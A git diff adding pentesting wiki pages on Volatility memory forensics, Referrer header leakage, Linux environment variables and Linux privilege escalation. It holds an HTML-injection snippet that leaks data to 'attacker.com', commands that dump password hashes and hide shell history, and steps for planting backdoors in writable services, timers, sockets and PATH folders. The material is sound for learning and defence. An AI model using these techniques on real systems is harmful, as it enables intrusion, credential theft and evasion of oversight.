+To import this in wireshark go to _edit&gt;preference&gt;protocol&gt;ssl&gt;_ and import it in \(Pre\)-Master-Secret log filename:
+
+![](../../.gitbook/assets/image%20%28191%29.png)
+
+
+
diff --git a/forensics/volatility-examples.md b/forensics/volatility-examples.md
new file mode 100644
index 00000000..28dfcf65
--- /dev/null
+++ b/forensics/volatility-examples.md
@@ -0,0 +1,281 @@
+# Volatility - Examples
+
+If you want something as **fast** as possible: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility)
+
+```text
+python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # Will use most important plugins (could use a lot of space depending on the size of the memory)
+```
+
+[Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan)
+
+## A note on “list” vs. “scan” plugins
+
+Volatility has two main approaches to plugins, which are sometimes reflected in their names. “list” plugins will try to navigate through Windows Kernel structures to retrieve information like processes \(locate and walk the linked list of `_EPROCESS` structures in memory\), OS handles \(locating and listing the handle table, dereferencing any pointers found, etc\). They more or less behave like the Windows API would if requested to, for example, list processes.
+
+That makes “list” plugins pretty fast, but just as vulnerable as the Windows API to manipulation by malware. For instance, if malware uses DKOM to unlink a process from the `_EPROCESS` linked list, it won’t show up in the Task Manager and neither will it in the pslist.
+
+“scan” plugins, on the other hand, will take an approach similar to carving the memory for things that might make sense when dereferenced as specific structures. `psscan` for instance will read the memory and try to make out `_EPROCESS` objects out of it \(it uses pool-tag scanning, which is basically searching for 4-byte strings that indicate the presence of a structure of interest\). The advantage is that it can dig up processes that have exited, and even if malware tampers with the `_EPROCESS` linked list, the plugin will still find the structure lying around in memory \(since it still needs to exist for the process to run\). The downfall is that “scan” plugins are a bit slower than “list” plugins, and can sometimes yield false-positives \(a process that exited too long ago and had parts of its structure overwritten by other operations\).
+
+From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/)
+
+## Get profile
+
+```text
+volatility imageinfo -f file.dmp
+volatility kdbgscan -f file.dmp
+```
+
+### **Differences between imageinfo and kdbgscan**
+
+As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address \(if there happen to be multiple\). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile \(or if you have a profile suggestion from imageinfo\), then make sure you use it \(from [here](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/)\).
+
+Always take a look in the **number of procceses that kdbgscan has found**. Sometimes imageinfo and kdbgscan can find **more than one** suitable **profile** but only the **valid one will have some process related** \(This is because in order to extract processes the correct KDBG address is needed\)
+
+```text
+# GOOD
+PsActiveProcessHead           : 0xfffff800011977f0 (37 processes)
+PsLoadedModuleList            : 0xfffff8000119aae0 (116 modules)
+```
+
+```text
+# BAD
+PsActiveProcessHead           : 0xfffff800011947f0 (0 processes)
+PsLoadedModuleList            : 0xfffff80001197ac0 (0 modules)
+```
+
+### KDBG
+
+The **kernel debugger block** \(named KdDebuggerDataBlock of the type \_KDDEBUGGER\_DATA64, or **KDBG** by volatility\) is important for many things that Volatility and debuggers do. For example, it has a reference to the PsActiveProcessHead which is the list head of all processes required for process listing.
+
+## Hashes/Passwords
+
+Extract password hashes from memory
+
+```text
+volatility --profile=Win7SP1x86_23418 hashdump -f ch2.dmp   #Local hashes
+volatility --profile=Win7SP1x86_23418 cachedump -f ch2.dmp
+volatility --profile=Win7SP1x86_23418 lsadump -f ch2.dmp    # LSA secrets
+```
+
+## Memory Dump
+
+The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**.
+
+```text
+volatility -f ch2.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/
+```
+
+## Processes
+
+### List processes
+
+Try to find **suspicious** processes \(by name\) or **unexpected** child **processes** \(for example a cmd.exe as a child of iexplorer.exe\).
+
+```text
+volatility --profile=PROFILE pstree -f DUMP # Get process tree (not hidden)
+volatility --profile=PROFILE pslist -f DUMP # Get process list (EPROCESS)
+volatility --profile=PROFILE psscan -f DUMP # Get hidden process list(malware)
+volatility --profile=PROFILE psxview -f DUMP # Get hidden process list
+```
+
+### Dump proc
+
+```text
+volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f ch2.dmp
+```
+
+### Command line
+
+Something suspicious was executed?
+
+```text
+volatility --profile=PROFILE cmdline -f DUMP #Display process command-line arguments
+volatility --profile=PROFILE consoles -f DUMP #command history by scanning for _CONSOLE_INFORMATION
+```
+
+Commands entered into cmd.exe are processed by **conhost.exe** \(csrss.exe prior to Windows 7\). So even if an attacker managed to **kill the cmd.exe** **prior** to us obtaining a memory **dump**, there is still a good chance of **recovering history** of the command line session from **conhost.exe’s memory**. If you find **something weird**\(using the consoles modules\), try to **dump** the **memory** of the **conhost.exe associated** process and **search** for **strings** inside it to extract the command lines.
+
+### Environment
+
+```text
+volatility --profile=PROFILE envars -f DUMP #Display process environment variables
+```
+
+### Privileges
+
+Unexpected and exploitable privileges in a process?
+
+```text
+#Get enabled privileges of some processes
+volatility --profile=Win7SP1x86_23418 privs --pid=3152 -f file.dmp | grep Enabled
+#Get all processes with interesting privileges
+volatility --profile=Win7SP1x86_23418 privs -f file.dmp | grep Enabled | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege" 
+```
+
+### SIDs
+
+Processes running with admin privileges?
+
+```text
+#Get the SID of a process
+volatility --profile=Win7SP1x86_23418 privs --pid=3152 -f file.dmp | grep Enabled
+#Get processes with admin privileges
+volatility --profile=Win7SP1x86_23418 getsids  -f ch2.dmp | grep -i admin
+```
+
+### Handles
+
+Useful to know to which other files, keys, threads, processes... a **process has a handle** for \(has opened\)
+
+```text
+volatility --profile=Win7SP1x86_23418 handles --pid=3152 -f ch2.dmp
+```
+
+### DLLs
+
+```text
+volatility --profile=Win7SP1x86_23418 dlllist --pid=3152 -f ch2.dmp #Get dlls of a proc
+volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f ch2.dmp #Dump dlls of a proc
+```
+
+## Services
+
+```text
+#Get services and binary path
+volatility --profile=Win7SP1x86_23418 svcscan-f ch2.dmp
+#Get name of the services and SID (slow)
+volatility --profile=Win7SP1x86_23418 getservicesids -f ch2.dmp
+```
+
+## Network
+
+```text
+volatility --profile=Win7SP1x86_23418 netscan -f ch2.dmp
+volatility --profile=Win7SP1x86_23418 connections -f ch2.dmp #XP and 2003 only
+volatility --profile=Win7SP1x86_23418 connscan -f ch2.dmp #TCP connections 
+volatility --profile=Win7SP1x86_23418 sockscan -f ch2.dmp #Open sockets
+volatility --profile=Win7SP1x86_23418 sockets -f ch2.dmp #Scanner for tcp socket objects
+```
+
+## Hive
+
+### Print available hives
+
+```text
+volatility --profile=Win7SP1x86_23418 hivelist -f ch2.dmp
+```
+
+### Get a value
+
+```text
+volatility --profile=Win7SP1x86_23418 printkey -K "Software\Microsoft\Windows NT\CurrentVersion" -f ch2.dmp
+# Get Run binaries registry value
+volatility -f ch2.dmp --profile=Win7SP1x86 printkey -o 0x9670e9d0 -K 'Software\Microsoft\Windows\CurrentVersion\Run'
+```
+
+### Dump
+
+```text
+#Dump a hive
+volatility --profile=Win7SP1x86_23418 hivedump -o 0x9aad6148 -f ch2.dmp #Offset extracted by hivelist
+#Dump all hives
+volatility --profile=Win7SP1x86_23418 hivedump -f ch2.dmp
+```
+
+## Files
+
+### Scan/dump
+
+```text
+volatility --profile=Win7SP1x86_23418 filescan -f ch2.dmp #Scan for files inside the dump
+volatility --profile=Win7SP1x86_23418 dumpfiles -n --dump-files=. -f ch2.dmp #Dump the files
+```
+
+### SSL Keys/Certs
+
+Interesting options for this modules are: _--pid, --name, --ssl_
+
+```text
+volatility --profile=Win7SP1x86_23418 dumpcerts --dump-dir=. -f ch2.dmp
+```
+
+## Malware
+
+```text
+volatility --profile=Win7SP1x86_23418 malfind -f ch2.dmp
+volatility --profile=Win7SP1x86_23418 apihooks -f ch2.dmp
+volatility --profile=Win7SP1x86_23418 driverirp -f ch2.dmp
+```
+
+### Scanning with yara
+
+Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)  
+Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
+
+```text
+wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
+mkdir rules
+python malware_yara_rules.py
+volatility --profile=Win7SP1x86_23418 yarascan -y malware_rules.yar -f ch2.dmp | grep "Rule:" | grep -v "Str_Win32" | sort | uniq
+```
+
+## External Plugins
+
+When you use an external plugin **the first parameter** that you have to set is `--plugins`
+
+### Autoruns
+
+Download it from [https://github.com/tomchop/volatility-autoruns](https://github.com/tomchop/volatility-autoruns)
+
+```text
+ volatility --plugins=volatility-autoruns/ --profile=WinXPSP2x86 -f dump.img autoruns
+```
+
+## MISC
+
+### Get clipboard
+
+```text
+volatility --profile=Win7SP1x86_23418 clipboard -f ch2.dmp
+```
+
+### Get IE history
+
+```text
+volatility --profile=Win7SP1x86_23418 iehistory -f ch2.dmp
+```
+
+### Get notepad text
+
+```text
+volatility --profile=Win7SP1x86_23418 notepad -f ch2.dmp
+```
+
+### Screenshot
+
+```text
+volatility --profile=Win7SP1x86_23418 screenshot -f ch2.dmp
+```
+
+### Mutantscan
+
+```text
+volatility --profile=Win7SP1x86_23418 mutantscan -f ch2.dmp
+```
+
+### Master Boot Record \(MBR\)
+
+```text
+volatility --profile=Win7SP1x86_23418 mbrparser -f ch2.dmp
+```
+
+The MBR holds the information on how the logical partitions, containing [file systems](https://en.wikipedia.org/wiki/File_system), are organized on that medium. The MBR also contains executable code to function as a loader for the installed operating system—usually by passing control over to the loader's [second stage](https://en.wikipedia.org/wiki/Second-stage_boot_loader), or in conjunction with each partition's [volume boot record](https://en.wikipedia.org/wiki/Volume_boot_record) \(VBR\). This MBR code is usually referred to as a [boot loader](https://en.wikipedia.org/wiki/Boot_loader). From [here](https://en.wikipedia.org/wiki/Master_boot_record).
+
+### Master File Table
+
+```text
+volatility --profile=Win7SP1x86_23418 mftparser -f ch2.dmp
+```
+
+ The NTFS file system contains a file called the _master file table_, or MFT. There is at least one entry in the MFT for every file on an NTFS file system volume, including the MFT itself. All information about a file, including its size, time and date stamps, permissions, and data content, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries. From [here](https://docs.microsoft.com/en-us/windows/win32/fileio/master-file-table).
+
diff --git a/interesting-http.md b/interesting-http.md
new file mode 100644
index 00000000..fd058e89
--- /dev/null
+++ b/interesting-http.md
@@ -0,0 +1,38 @@
+# Interesting HTTP
+
+## Referrer headers and policy
+
+Referrer is the header used by browsers to indicate which was the previous page visited.
+
+### Sensitive information leaked
+
+If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest \(social engineering\) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request.
+
+### Mitigation
+
+You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications:
+
+```text
+Referrer-Policy: no-referrer
+Referrer-Policy: no-referrer-when-downgrade
+Referrer-Policy: origin
+Referrer-Policy: origin-when-cross-origin
+Referrer-Policy: same-origin
+Referrer-Policy: strict-origin
+Referrer-Policy: strict-origin-when-cross-origin
+Referrer-Policy: unsafe-url
+```
+
+### Counter-Mitigation
+
+You can override this rule using an HTML meta tag \(the attacker needs to exploit and HTML injection\):
+
+```markup
+<meta name="referrer" content="unsafe-url">
+<img src="https://attacker.com">
+```
+
+### Defense
+
+Never put any sensitive data inside GET parameters or paths in the URL.
+
diff --git a/linux-unix/linux-environment-variables.md b/linux-unix/linux-environment-variables.md
new file mode 100644
index 00000000..c054e2d5
--- /dev/null
+++ b/linux-unix/linux-environment-variables.md
@@ -0,0 +1,142 @@
+# Linux Environment Variables
+
+## Global variables
+
+The **global variables** will be **inherited** by **child processes**.
+
+You can create a Global variable for your current session doing:
+
+```bash
+export MYGLOBAL="hello world"
+echo $MYGLOBAL #Prints: hello world
+```
+
+This variable will be accessible by your current sessions and its child processes.
+
+You can **remove** a variable doing:
+
+```bash
+unset MYGLOBAL
+```
+
+## Local variables
+
+The **local variables** can only be **accessed** by the **current shell/script**.
+
+```bash
+LOCAL="my local"
+echo $LOCAL
+unset LOCAL
+```
+
+## List current variables
+
+```bash
+set
+env
+printenv
+cat /proc/$$/environ
+cat /proc/`python -c "import os; print(os.getppid())"`/environ
+```
+
+## Persistent Environment variables
+
+#### **Files that affect behavior of every user:**
+
+* _**/etc/bash.bashrc**_ ****: This file is read whenever an interactive shell is started \(normal terminal\) and all the commands specified in here are executed.
+* _**/etc/profile and /etc/profile.d/\***_**:** This file is read every time a user logs in. Thus all the commands executed in here will execute only once at the time of user logging in.
+  * **Example:** 
+
+    `/etc/profile.d/somescript.sh`
+
+    ```bash
+    #!/bin/bash
+    TEST=$(cat /var/somefile)
+    export $TEST
+    ```
+
+#### **Files that affect behavior for only a specific user:**
+
+* _**~/.bashrc**_ **:** This file behaves the same way _/etc/bash.bashrc_ file works but it is executed only for a specific user. If you want to create an environment for yourself go ahead and modify or create this file in your home directory.
+* _**~/.profile, ~/.bash\_profile, ~/.bash\_login**_**:** These files are same as _/etc/profile_. The difference comes in the way it is executed. This file is executed only when a user in whose home directory this file exists, logs in.
+
+**Extracted from:** [**here**](https://codeburst.io/linux-environment-variables-53cea0245dc9) **and** [**here**](https://www.gnu.org/software/bash/manual/html_node/Bash-Startup-Files.html)\*\*\*\*
+
+## Common variables
+
+From: [https://geek-university.com/linux/common-environment-variables/](https://geek-university.com/linux/common-environment-variables/)
+
+* **DISPLAY** – the display used by **X**. This variable is usually set to **:0.0**, which means the first display on the current computer.
+* **EDITOR** – the user’s preferred text editor.
+* **HISTFILESIZE** – the maximum number of lines contained in the history file.
+* **HISTSIZE -** Number of lines added to the history file when the user finish his session
+* **HOME** – your home directory.
+* **HOSTNAME** – the hostname of the computer.
+* **LANG** – your current language.
+* **MAIL** – the location of the user’s mail spool. Usually **/var/spool/mail/USER**.
+* **MANPATH** – the list of directories to search for manual pages.
+* **OSTYPE** – the type of operating system.
+* **PS1** – the default prompt in bash.
+* **PATH -** stores the path of all the directories which holds binary files you want to execute just by specifying the name of the file and not by relative or absolute path.
+* **PWD** – the current working directory.
+* **SHELL** – the path to the current command shell \(for example, **/bin/bash**\).
+* **TERM** – the current terminal type \(for example, **xterm**\).
+* **TZ** – your time zone.
+* **USER** – your current username.
+
+## Interesting variables for hacking
+
+### **HISTFILESIZE**
+
+Change the **value of this variable to 0**, so when you **end your session** the **history file** \(~/.bash\_history\) **will be deleted**.
+
+```bash
+export HISTFILESIZE=0
+```
+
+### **HISTSIZE**
+
+Change the **value of this variable to 0**, so when you **end your session** any command will be added to the **history file** \(~/.bash\_history\).
+
+```bash
+export HISTSIZE=0
+```
+
+### http\_proxy
+
+The processes will use the **proxy** declared here to connect to internet through **http**.
+
+```bash
+export http_proxy="http://10.10.10.10:8080"
+```
+
+### https\_proxy
+
+The processes will use the **proxy** declared here to connect to internet through **https**.
+
+```bash
+export https_proxy="http://10.10.10.10:8080"
+```
+
+### PS1
+
+Change how your prompt looks.
+
+**I have created** [**this one**](https://gist.github.com/carlospolop/43f7cd50f3deea972439af3222b68808) \(based on another, read the code\).
+
+Root:
+
+![](../.gitbook/assets/image%20%28177%29.png)
+
+Regular user:
+
+![](../.gitbook/assets/image%20%28239%29.png)
+
+One, two and three backgrounded jobs:
+
+![](../.gitbook/assets/image%20%28276%29.png)
+
+One background job, one stopped and last command dind't finish correctly:
+
+![](../.gitbook/assets/image%20%2874%29.png)
+
diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md
new file mode 100644
index 00000000..5707c908
--- /dev/null
+++ b/linux-unix/linux-privilege-escalation-checklist.md
@@ -0,0 +1,90 @@
+---
+description: Checklist for privilege escalation in Linux
+---
+
+# Checklist - Linux Privilege Escalation
+
+### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)\*\*\*\*
+
+### [Vulnerable Kernel?](privilege-escalation/#kernel-exploits)
+
+* [ ] Search for kernel **exploits using scripts** \(linux.exploit-suggester.sh, inux-exploit-suggester2.pl, linuxprivcheckser.py\)
+* [ ] Use **Google to search** for kernel **exploits**
+* [ ] Use **searchsploit to search** for kernel **exploits**
+* [ ] **Check** if the [**sudo version** is vulnerable](privilege-escalation/#sudo-version)
+
+### [Vulnerable Processes?](privilege-escalation/#processes)
+
+* [ ] Is  any **unknown software running**?
+* [ ] Is any software with **more privileges that it should have running**?
+* [ ] Search for **exploits for running processes** \(specially if running of versions\)
+* [ ] Can you **read** some interesting **process memory** \(where passwords could be saved\)?
+
+### [Known users/passwords?](privilege-escalation/#users)
+
+* [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without password.
+
+### [Interesting Groups?](privilege-escalation/#groups)
+
+* [ ] Check **if** you [**belong** to any **group** that can grant you **root rights**](privilege-escalation/interesting-groups-linux-pe.md).
+
+### [Weird scheduled jobs?](privilege-escalation/#scheduled-jobs)
+
+* [ ] Is the **PATH** being modified by some cron and you can **write** in it?
+* [ ] Some **modifiable script** is being **executed** or is inside **modifiable folder**?
+* [ ] Is some cron **script calling other** script that is **modifiable** by you? or using **wildcards**?
+* [ ] Have you detected that some **script** could be being **executed** very **frequently**? \(every 1, 2 or 5 minutes\)
+
+### [Any sudo command?](privilege-escalation/#commands-with-sudo-and-suid-commands)
+
+* [ ] Can you execute **any comand with sudo**? Can you use it to READ, WRITE or EXECUTE anything as root?
+* [ ] Is some **wildcard used**?
+* [ ] Is the binary specified **without path**?
+* [ ] Is _**env\_keep+=LD\_PRELOAD**_?
+
+### [Any weird suid command?](privilege-escalation/#commands-with-sudo-and-suid-commands)
+
+* [ ] **SUID** any **interesting command**? Can you use it to READ, WRITE or EXECUTE anything as root?
+* [ ] Is some **wildcard used**?
+* [ ] Is the SUID binary **executing some other binary without specifying the path**? or specifying it?
+* [ ] Is it trying to **load .so from writable folders**?
+
+### [Weird capabilities?](privilege-escalation/#capabilities)
+
+* [ ] Has any binary any **uncommon capability**?
+
+### [Open Shell sessions?](privilege-escalation/#open-shell-sessions)
+
+* [ ] screen?
+* [ ] tmux?
+
+### [Can you read some sensitive data?](privilege-escalation/#read-sensitive-data)
+
+* [ ] Can you **read** some **interesting files**? \(files with passwords, \*\_history, backups...\)
+
+### [Can you write important files?](privilege-escalation/#writable-files)
+
+* [ ] Are you able to **write files that could grant you more privileges**? \(service conf files, shadow,a script that is executed by other users, libraries...\)
+
+### [Internal open ports?](privilege-escalation/#internal-open-ports)
+
+* [ ] You should check if any undiscovered service is running in some port/interface. Maybe it is running with more privileges that it should or it is vulnerable to some kind of privilege escalation vulnerability.
+
+### [Can you sniff some passwords in the network?](privilege-escalation/#sniffing)
+
+* [ ] Can you **sniff** and get **passwords** from the **network**?
+
+### [Any service missconfigurated? NFS? belongs to docker or lxd?](privilege-escalation/#privesc-exploiting-service-misconfigurations)
+
+1. [ ] Any well known missconfiguration? \([**NFS no\_root\_squash**](privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)\)
+
+### [Any weird executable in path?](privilege-escalation/#check-for-weird-executables)
+
+
+
+If you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%284%29.png)
+
+​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
+
diff --git a/linux-unix/privilege-escalation/README.md b/linux-unix/privilege-escalation/README.md
new file mode 100644
index 00000000..5ce46013
--- /dev/null
+++ b/linux-unix/privilege-escalation/README.md
@@ -0,0 +1,834 @@
+# Linux Privilege Escalation
+
+Do you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+## Kernel exploits
+
+Check the kernel version and if there is some exploit that can be used to escalate privileges
+
+```bash
+cat /proc/version
+uname -a
+searchsploit "Linux Kernel"
+```
+
+You can find a good vulnerable kernel list and some already **compiled exploits** here: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits)  
+Other sites where you can find some **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
+
+To extract all the vulnerable kernel versions from that web you can do:
+
+```bash
+curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '
+```
+
+Tools that could help searching for kernel exploits are:
+
+[linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)  
+[linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)  
+[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) \(execute IN victim,only checks exploits for kernel 2.x\)
+
+Always **search the kernel version in Google**, maybe your kernel version is wrote in some kernel exploit and then you will be sure that this exploit is valid.
+
+### Sudo version
+
+Based on the vulnerable sudo versions that appear in:
+
+```bash
+searchsploit sudo
+```
+
+You can check if the sudo version is vulnerable using this grep.
+
+```bash
+sudo -V | grep "Sudo ver" | grep "1.6.8p9\|1.6.9p18\|1.8.14\|1.8.20\|1.6.9p21\|1.7.2p4\|1\.8\.[0123]$\|1\.3\.[^1]\|1\.4\.\d*\|1\.5\.\d*\|1\.6\.\d*\|1.5$\|1.6$"
+```
+
+## Software exploits
+
+Check for the **version of the installed packages and services**. Maybe there is some old Nagios version \(for example\) that could be exploited for gaining privileges…
+
+It is recommended to check manually the version of the more suspicious installed software.
+
+```bash
+dpkg -l #Debian
+rpm -qa #Centos
+```
+
+If you have SSH access to the machine you could also use **openVAS** to check for outdated and vulnerable software installed inside the machine.
+
+## Users
+
+Check who are you, which privileges do you have, which users are in the systems, which ones can login and which ones have root privileges
+
+```bash
+id || (whoami && groups) 2>/dev/null #Me?
+cat /etc/passwd | cut -d: -f1 #All users
+cat /etc/passwd | grep "sh$" #Users with console
+awk -F: '($3 == "0") {print}' /etc/passwd #Superusers
+w #Currently login users
+last | tail #Login history
+```
+
+### Big UID
+
+Some Linux versions were affected by a bug that allow users with **UID &gt; INT\_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74),  [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).  
+**Exploit it** using: **`systemd-run -t /bin/bash`**
+
+### Known passwords
+
+If you have any password of the environment try to login as other user
+
+## Groups
+
+Check if you are in some group that could grant you root rights:
+
+[Check if you belong to any of these groups](interesting-groups-linux-pe.md)
+
+## Writable PATH abuses
+
+### $PATH
+
+If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user \(root ideally\) and that is **not loaded from a folder that is located previous** to your writable folder in $PATH.
+
+## Services
+
+### Writable _.service_ files
+
+Check if you can write any `.service` file, if you can, you **could modify it** so it **executes** your **backdoor when** the service is **started**, **restarted** or **stopped** \(maybe you will need to wait until the machine is rebooted\).
+
+### Writable service binaries
+
+Keep in mid that if you have **write permissions over binaries being executed by services**, you can change them for backdoors so when the services get re-executed the backdoors will be executed.
+
+### systemd PATH - Relative Paths
+
+You can see the PATH used by **systemd** with:
+
+```bash
+systemctl show-environment
+```
+
+If you find that you can **write** in any of the folders of the path you may be able to **escalate privileges**. You need to search for **relative paths being used on service configurations** files like:
+
+```bash
+ExecStart=faraday-server
+ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
+ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello"
+```
+
+Then, create a **executable** with the **same name as the relative path binary** inside the systemd PATH folder you can write, and when the service is asked to execute the vulnerable action \(**Start**, **Stop**, **Reload**\), your **backdoor will be executed** \(unprivileged users usually cannot start/stop services but check if you can using `sudo -l`\).
+
+**Learn more about services with  `man systemd.service`.**
+
+## **Timers**
+
+**Timers** are systemd unit files whose name ends in . **timer** that control . service files or events. **Timers** can be used as an alternative to cron. **Timers** have built-in support for calendar time events, monotonic time events, and can be run asynchronously.
+
+You can enumerate all the timers doing:
+
+```bash
+systemctl list-timers --all
+```
+
+### Writable timers
+
+If you can modify a timer you can make it execute some existent systemd.unit \(like a `.service` or a `.target`\)
+
+```bash
+Unit=backdoor.service
+```
+
+In the documentation you can read what the Unit is:
+
+> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. \(See above.\) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix.
+
+Therefore, in order to abuse this permissions you would need to:
+
+* find some systemd unit \(like a `.service`\) that is **executing a writable binary**
+* Find some systemd unit that is **executing a relative path** and you have **writable privileges** over the **systemd PATH** \(to impersonate that executable\)
+
+**Learn more about timers with  `man systemd.timer`.**
+
+### **Enabling Timer**
+
+In order to enable a timer you need  root privileges and to execute: 
+
+```bash
+sudo systemctl enable backu2.timer
+Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.
+```
+
+Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/<WantedBy_section>.wants/<name>.timer`
+
+## Sockets
+
+In brief, a Unix Socket \(technically, the correct name is Unix domain socket, **UDS**\) allows **communication between two different processes** on either the same machine or different machines in client-server application frameworks. To be more precise, it’s a way of communicating among computers using a standard Unix descriptors file. \(From [here](https://www.linux.com/news/what-socket/)\).
+
+Sockets can be configured using `.socket` files.
+
+**Learn more about sockets with  `man systemd.socket`.** Inside this file some several interesting parameters can be configured:
+
+* `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: This options are different but as summary as used to **indicate where is going to listen** the socket \(the path of the AF\_UNIX socket file, the IPv4/6 and/or port number to listen...\).
+* `Accept`: Takes a boolean argument. If **true**, a **service instance is spawned for each incoming connection** and only the connection socket is passed to it. If **false**, all listening sockets themselves are **passed to the started service unit**, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs where a single service unit unconditionally handles all incoming traffic. **Defaults to false**. For performance reasons, it is recommended to write new daemons only in a way that is suitable for `Accept=no`.
+* `ExecStartPre`, `ExecStartPost`: Takes one or more command lines, which are **executed before** or **after** the listening **sockets**/FIFOs are **created** and bound, respectively. The first token of the command line must be an absolute filename, then followed by arguments for the process.
+* `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively.
+* `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket \(with the suffix replaced\). In most cases, it should not be necessary to use this option.
+
+### Writable .socket files
+
+If you find a **writable** `.socket` file you can **add** at the begging of the `[Socket]` section something like:  `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**  
+_Note that the system must be using that socket file configuration or the backdoor won't be executed_
+
+### Writable sockets
+
+If you **identify any writable socket** \(_now where are talking about Unix Sockets, not about the config `.socket` files_\), then, **you can communicate** with that socket and maybe exploit a vulnerability.
+
+### HTTP sockets
+
+Note that there may be some **sockets listening for HTTP** requests \(_I'm not talking about .socket files but about the files acting as unix sockets_\). You can check this with:
+
+```bash
+curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
+```
+
+If the socket **respond with a HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**.
+
+## **D-Bus**
+
+D-BUS is an **interprocess communication \(IPC\) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system.
+
+D-BUS, as a full-featured IPC and object system, has several intended uses. First, D-BUS can perform basic application IPC, allowing one process to shuttle data to another—think **UNIX domain sockets on steroids**. Second, D-BUS can facilitate sending events, or signals, through the system, allowing different components in the system to communicate and ultimately to integrate better. For example, a Bluetooth dæmon can send an incoming call signal that your music player can intercept, muting the volume until the call ends. Finally, D-BUS implements a remote object system, letting one application request services and invoke methods from a different object—think CORBA without the complications. ****\(From [here](https://www.linuxjournal.com/article/7744)\).
+
+D-Bus use an **allow/deny model**, where each message \(method call, signal emission, etc.\) can be **allowed or denied** according to the sum of all policy rules which match it. Each  or  rule in the policy should have the `own`, `send_destination` or `receive_sender` attribute set.
+
